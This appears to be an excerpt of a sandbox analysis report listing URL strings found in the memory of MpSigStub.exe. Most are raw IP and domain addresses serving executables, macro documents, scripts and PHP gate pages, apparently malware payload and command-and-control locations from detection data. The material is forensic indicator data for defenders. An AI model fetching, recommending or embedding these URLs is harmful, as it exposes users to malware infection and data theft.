Source: MpSigStub.exe, 00000024.00000003.6293096859.00000197A3151000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:27777/?inj=http://
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:5
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:5/
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:5555/
Source: MpSigStub.exe, 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:8000/web.html?url=yac.mx&rate=501&id=%s&key=%s&pm=1x
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:8081/dial.html?
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:8089/index.html?
Source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:8332
Source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:8545
Source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:9600/IperiusHSa
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://139.162.
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://144.217.14.173/doc.doc
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://149.20.4.69
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	String found in binary or memory: http://149.202.110.58/document_012001.doc
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: http://149.3.170.235/qw-fad/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://151.248.115.253/%sproc0%%sproc0%exit
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: http://152.89.218.86/
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp	String found in binary or memory: http://158.255.1.137/1/live.php
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp	String found in binary or memory: http://158.255.5.220
Source: MpSigStub.exe, 00000024.00000003.6276556833.00000197A3CCB000.00000004.00000001.sdmp	String found in binary or memory: http://159.8.31.231/
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: http://162.241.124.111/q/1.gif
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	String found in binary or memory: http://164.132.171.89/promo.php
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://165.227.7.138/index.hta
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://167.114.35.111/~miraclen/sul2/sul2.exe
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://169.54.172.92/coreslibri.zip
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp	String found in binary or memory: http://170.130.55.135/api.php
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://172.16.1.1/exm.rtf
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://172.245.119.81/.----------------------.------------------------------.-/s.wbk
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://173.201.215.95/depmex/xhi05bs8.php?id=2809310
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://173.208.139.170/s.txt
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://178.128.11.199/qtx.
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://178.128.115.182/wp-includes/3_y/
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://178.62.19.66/campo/v/v
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp	String found in binary or memory: http://178.79.137.25/campo/
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	String found in binary or memory: http://179.43.158.187/PhtJFr0fvBk2.php
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://18.130.111.206/wp/x_y/
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://181.174.166.137/sys/f4.exe
Source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp	String found in binary or memory: http://184.105.163.238/
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	String found in binary or memory: http://185.14.30.131/api.php
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp	String found in binary or memory: http://185.14.31.93/nuzq5lag7htb.php
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: http://185.141.25.168/check_attack/
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp	String found in binary or memory: http://185.153.198.216:8010/UserService
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://185.165.29.36/11.mov
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp	String found in binary or memory: http://185.165.30.31
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: http://185.172.110.217/kvsn/image.png
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp	String found in binary or memory: http://185.172.110.217/robx/remit.jpg
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	String found in binary or memory: http://185.180.197.66/2vjdz6jaqzeiq.php
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://185.183.98.14/fontsupdate.php
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	String found in binary or memory: http://185.22.153.9/desktop-u2u8a6r/nature/
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	String found in binary or memory: http://185.22.153.9/desktop-u2u8a6r/nature/prey.dot
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	String found in binary or memory: http://185.225.19.240/dmenconsvc.dll
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	String found in binary or memory: http://185.236.231.209/xcel/copy/xel.phpmethod=post
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	String found in binary or memory: http://185.236.231.210/test/en/dsf.php
Source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp	String found in binary or memory: http://185.243.215.213/sys_info.vbs
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp	String found in binary or memory: http://185.250.149.128/
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: http://185.26.113.95:8095/batpower2.txt
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: http://185.38.142.91/awo/
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: http://185.38.142.91/awo/next.php
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: http://185.82.218.2/
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	String found in binary or memory: http://185.82.218.30/44313
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp	String found in binary or memory: http://185.99.2.83/frte1z0xiwu8q.php
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	String found in binary or memory: http://187.157.146.147/m0rpheus/index.php?mon=
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	String found in binary or memory: http://188.127.254.159/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://189.1.168.10/~festaefe/1024bit.php
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp	String found in binary or memory: http://190.14.37.190/
Source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp	String found in binary or memory: http://190.14.37.191/
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	String found in binary or memory: http://191.101.239.86/root/migytkyt5bberd
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp	String found in binary or memory: http://192.168.0.108/download.ps1
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp	String found in binary or memory: http://192.168.1.60/6464.exe
Source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp	String found in binary or memory: http://192.168.100.5/00ButtonTest.exe
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp	String found in binary or memory: http://192.168.213.131/logo.doc
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp	String found in binary or memory: http://192.168.88.
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: http://192.189.25.17/cgbin/ukbros
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp	String found in binary or memory: http://192.227.228.85/.--...........................................................................
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://192.3.141.134/document_m.doc
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: http://192.3.141.173/word/
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: http://192.3.152.134/nda/document.doc
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp	String found in binary or memory: http://192.3.22.5/.-................................................................................
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: http://192.3.31.211/index.php?macos=
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	String found in binary or memory: http://192.99.214.32/word1.tmp
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://193.107.19.250:89/users/gigi_eli/ax.php
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	String found in binary or memory: http://193.203.202.55/
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	String found in binary or memory: http://193.38.55.92/gfmppbpq
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	String found in binary or memory: http://194.145.227.21sys=$(date
Source: MpSigStub.exe, 00000024.00000003.6344346071.00000197A30DC000.00000004.00000001.sdmp	String found in binary or memory: http://194.178.112.202
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	String found in binary or memory: http://194.5.249.101/api.php
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp	String found in binary or memory: http://194.5.249.107/2nquxqz2ok4a45l.php
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	String found in binary or memory: http://195.123.210.174/
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: http://195.123.219.21/campo/t3/t3d
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp	String found in binary or memory: http://195.123.220.249/campo/t2/t2dcdddebp%&c
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	String found in binary or memory: http://195.225.176.34/ad/
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://195.226.220.112/~admin/.
Source: MpSigStub.exe, 00000024.00000003.6296880704.00000197A4AB8000.00000004.00000001.sdmp	String found in binary or memory: http://195.78.108.
Source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp	String found in binary or memory: http://195.95.218.173/dl/dl.php?
Source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp	String found in binary or memory: http://195.95.218.173/troys/
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp	String found in binary or memory: http://198.12.127.217/.--------------------------.--------------........-...................-/_.....
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://198.23.212.187/_......................................_......................-/
Source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp	String found in binary or memory: http://198.23.213.25/document.doc
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	String found in binary or memory: http://198.23.251.121/_--_-_---_-_--__------_.......................................................
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp	String found in binary or memory: http://198.46.132.163/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://198.46.132.185/.--_------------------------------------------.-----/
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: http://198.46.201.115/.-...................................................-.-/..-------------------
Source: MpSigStub.exe, 00000024.00000003.6276556833.00000197A3CCB000.00000004.00000001.sdmp	String found in binary or memory: http://198.50.114.16
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://1animalsnames.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	String found in binary or memory: http://1bestgate.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	String found in binary or memory: http://1lxtjdias-pod:8080/stage3.exe
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://200.159.128.
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://200.63.45.105/duiss/duiss
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://200.98.
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	String found in binary or memory: http://2010-kpss.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp	String found in binary or memory: http://2012-wallpaper-hd.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp	String found in binary or memory: http://2014secimleriturkiye.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp	String found in binary or memory: http://202.104.11.94
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://203.199.200.61
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: http://205.177.124.74/
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp	String found in binary or memory: http://205.185.116.78/
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://205.185.122.246/FQL66n
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp	String found in binary or memory: http://205.185.122.246/b9xbb3
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://205.185.122.246/files/may13.bin
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://205.185.122.246/khkwZF
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp	String found in binary or memory: http://205.185.125.104/1t1nnx
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: http://205.252.24.246/
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: http://207.154.225.82/report.json?type=mail&u=$muser&c=
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: http://207.226.171.35/
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: http://207.226.171.36/
Source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp	String found in binary or memory: http://207.226.177.108/sc.exe
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://208.115.201.245/ideal.zip
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://208.95.104.
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: http://209.141.35.239/33/
Source: MpSigStub.exe, 00000024.00000003.6321480698.00000197A3B3E000.00000004.00000001.sdmp	String found in binary or memory: http://209.141.61.124/Q-2/
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp	String found in binary or memory: http://209.141.61.124/q-2/img_0107803.exe
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: http://209.62.108.213/
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: http://209.62.108.220/
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://20vp.cn/moyu/
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://210302.top/
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	String found in binary or memory: http://212.129.31.67
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: http://212.192.241.203/xx/kl.exe
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: http://212.192.241.203/xx/kl.exex
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp	String found in binary or memory: http://212.237.58.208/0607/
Source: MpSigStub.exe, 00000024.00000003.6327269415.00000197A3790000.00000004.00000001.sdmp	String found in binary or memory: http://213.159.117.134/index.php
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp	String found in binary or memory: http://213.159.213.195/d.exe
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: http://216.170.114.73/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://216.172.154.248/pic/img.js
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://216.172.172.40/~agora546/cardoso/dilma.zip
Source: MpSigStub.exe, 00000024.00000003.6286203133.00000197A3ABB000.00000004.00000001.sdmp	String found in binary or memory: http://216.93.188.81/
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: http://217.73.6
Source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp	String found in binary or memory: http://217.8.117
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://217.8.117.60/arty.exe
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://217.8.117.63/
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp	String found in binary or memory: http://218.204.253.145/setup.exe
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp	String found in binary or memory: http://220.73.162.2/Download
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp	String found in binary or memory: http://220.73.162.4/Download
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	String found in binary or memory: http://22112017.flashplayeron.com
Source: MpSigStub.exe, 00000024.00000003.6344346071.00000197A30DC000.00000004.00000001.sdmp	String found in binary or memory: http://23.244.141.185/cgi-bin
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	String found in binary or memory: http://23.249.163.163/qwerty.exe
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://23.95.122.24/..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	String found in binary or memory: http://23.95.122.25/..-.-................-.....-------------/
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	String found in binary or memory: http://23.95.122.25/..-.-................-.....-------------/.......................................
Source: MpSigStub.exe, 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp	String found in binary or memory: http://23.95.122.31/concord/
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	String found in binary or memory: http://23.95.231.200/images/footer1.dll
Source: MpSigStub.exe, 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp	String found in binary or memory: http://24-7-search.com/
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	String found in binary or memory: http://27.102.66.105/test.msi
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: http://27.192.62.107
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp	String found in binary or memory: http://2fa.com-token-auth.com/
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp	String found in binary or memory: http://2ndrequest.me/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://2p8s.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&cid=
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://2p8s.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp	String found in binary or memory: http://2udating.com
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp	String found in binary or memory: http://2udating.net
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://3.0.242.71/wp-content/2_ur/
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: http://3/upload/all/Decrypter.exe
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://31.192.209.
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://31.192.210.
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://31.192.211.
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: http://31.210.20.225:8080/server.exe")
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp	String found in binary or memory: http://3117488091/lib/jquery-3.2.1.min.js
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://3286924353/jb.jar
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://32player.com
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: http://3389.space/
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	String found in binary or memory: http://365well.org/zload/get_exe.php?l=
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	String found in binary or memory: http://37.120.206.70/dom/d.wbk
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: http://37.120.206.70/mend/
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp	String found in binary or memory: http://37.120.206.70/mend/m.wbk
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	String found in binary or memory: http://37.187.248.215/promo.php
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://3b3.org/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://3dcpw.net/house/404.htm
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	String found in binary or memory: http://3dplayful.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp	String found in binary or memory: http://3gool.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	String found in binary or memory: http://3novices.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	String found in binary or memory: http://3rbfilm.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://3s249.s249327.96.lt/mss2ro37qtl3cbw9vo0lk2bx8vv7jmx2mlesim9ddw11fem3sjp3ijuoufk/mss.php
Source: MpSigStub.exe, 00000024.00000003.6321480698.00000197A3B3E000.00000004.00000001.sdmp	String found in binary or memory: http://3z.fi/evil1/PMwGWkmh
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp	String found in binary or memory: http://45.12.32.58/
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: http://45.12.32.87/
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: http://45.12.32.9/
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	String found in binary or memory: http://45.138.157.216/44313
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://45.139.236.86/scan.wbk?raw=true
Source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp	String found in binary or memory: http://45.144.30.16/
